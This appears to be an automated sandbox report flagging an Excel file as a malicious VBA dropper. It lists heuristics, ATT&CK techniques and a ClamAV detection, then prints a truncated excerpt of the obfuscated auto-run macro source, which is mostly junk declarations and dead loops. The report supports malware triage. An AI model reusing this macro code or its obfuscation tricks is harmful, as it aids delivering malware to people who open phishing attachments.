MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing VBA macros, specifically a Workbook_Open macro that utilizes Shell() and CreateObject() calls. This strongly suggests the macro is designed to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-7119884-0' further supports this dropper functionality. No specific family could be identified due to the obfuscated nature of the VBA code.
Heuristics 7
- ClamAV: Doc.Dropper.Agent-7119884-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-7119884-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15429 bytes |

SHA-256: d92eda1b9119f706f89f6cf066cb269561fc608507fcababa26769abefc309c6
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 6 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
nPG5KKBD.YoAljhxiQwcGdd5BXOpw
While 2 = 7545
Dim bmDFCZy6Nq5Z4bSCLED6j9FvCHkOwAfHoQluj3hHr2Sj2C As Variant
Wend
Dim MBJ2xQJtKbf As Integer
While 22 = 8684
Dim QC4xhGLIutkygaSg4Mroe3_5i_5LN75_HNRynTH As Variant
Wend
Dim sEYEQkKlYdtPfc As Integer
While 18 = 8972
Dim w_WC9McL_5xyepQGc3iD8h_wrRWadqd As Variant
Wend
Dim pXkTM4vnFoe_d As Integer
While 24 = 2119
Dim QaEdSP_zpadM4jTpyArRYFZ4TDMqMbXbcjdOL3FLpm_6FFRRa8PmwvDJ_J As Variant
Wend
Dim HOCRlMBBtSE As Integer
While 18 = 9867
Dim Dc63ekvFcvMu4OOJunpeSOAs1HWAv4_U As Variant
Wend
Dim LWdTsQJPCfW5 As Integer
While 24 = 4490
Dim dHCVBPVCwuxaKBUMuTiq1up1uzAVeMOs As Variant
Wend
Dim lxV_SmslqRJZ As Integer
While 20 = 9995
Dim hBGq57er6pCraJkJO9fheDyWnU3Fj7_gjORr As Variant
Wend
Dim rRZhrgv6tngGBh As Integer
While 6 = 3967
Dim Vquk5cLsBiCWF8oeFK22b6g8z7Q3m_wuDBjQv8Txe8O1eSYwONfU As Variant
Wend
Dim OIEZHwu7KRE As Integer
While 14 = 6072
Dim BuQS_WWrGzDUdopbegclXcad46HG8LWkK1MEL_SX1eWdJwjtbTNXrpqh As Variant
Wend
Dim RvYHNOs5bbIl As Integer
While 8 = 6524
Dim ZiNeLDu2_6SETWnm882eIovZjIIkubBr As Variant
Wend
Dim m8S2_rJn5xbVbR As Integer
While 12 = 1417
Dim xzjE7dinauvw5B3HFl4kbUDugNvMjUKY8PUSAodfH9fg_PwGt As Variant
Wend
Dim upzazyauxgrq As Integer
While 28 = 7147
Dim TCEiVymphGaFVbcyfpPZmcyoT8FZ3hK As Variant
Wend
Dim Fvyw5Z7raHaJl As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "nPG5KKBD"
Dim pxgK6T_awKx4VsFNjR8jsPsdoMGfxlbR__89Rw6d1YObHs73p_zF_PpXDBerLhmJrdxUuF6wUcsSAPU6PNzwvUQxRh5PPMQRv_sm4jGhDCtffVVvpia7qyWVL_CKJn As String
Function MrDWUlNGPPC1MYNXrKv_5SSgnhXh7xQKQKZk3r_P(lMOSD78Ekw5APJgyqwBZEfFWeoB1eX8VX5uDeHArVAlxZDAM_eeGYf2EF1xW5EjLyhlTYbShvSDD3Q7anwz93z72Co7mSmwOZY92Z)
While 10 = 5693
Dim o2zP_wRJAWk2Lt_9n2fjlaHbv9C_heUSNK_ah_hkyKnelcbgWTvYHv2MrVc As Variant
Wend
Dim AtLleBPlAnlYmS5 As Integer
While 26 = 3650
Dim tYvmzRfdpMr5JbR1rKffzkiHbTza3u4H_MAbZ_fJdNfXvFEIqv3MEwDHzm As Variant
Wend
Dim Ida_k5Riz6ZzYm As Integer
Dim Dt_cTGdc9Z6XyJtKX9A6BXY7NquXJj1jJ3rvMutuk8ZZzl4yV4XRucEoTGNlV_QXhTL6b
While 22 = 6047
Dim oTBj_JUUMosE2oBQH2kw4AsXmj_KPHr1UNhutbCnP As Variant
Wend
Dim xOuUeBlggwhMlsm As Integer
While 27 = 5950
Dim kl7cEH_D61slFPgoy7e_t7CFhanrUImse4HFeh As Variant
Wend
Dim hFsKxcuYeO_F As Integer
Dim PJTclWjwrD3q8pPIZ_ip2np8tIsot2SEv642gEDpqiGA3yFMybGBm9YlcVrbm4Bytw5AuXkT_28QeoD5BdzPtPbvfQXIWkBvgRO_3EaZ1wAtAFExRvYG
While 12 = 4420
Dim sOEm3niy5mdUrvM_FLFYIOXXUhGiTG6XqNZVl2_dgol4lVbBNuRQGi6b1q As Variant
Wend
Dim QTe_cwp_nbU As Integer
While 16 = 2715
Dim VMKl2dmcu8_ESiymOFR8d4jo8fJyMfr_pWWDEeqaxW6RNYo47Cy As Variant
Wend
Dim fIWUbmemTR As Integer
While 4 = 3200
Dim xONODY6JtfsY1HF8PYh1P1IpKzQA5Yi2 As Variant
Wend
Dim UG_GqBI_rrKe_E As Integer
While 15 = 4201
Dim RMNdU_DbB6_gDMF4OT71DrG9ONNhGgnnk_fCvYCc As Variant
Wend
Dim w2EDBI862wb As Integer
Set PJTclWjwrD3q8
... (truncated)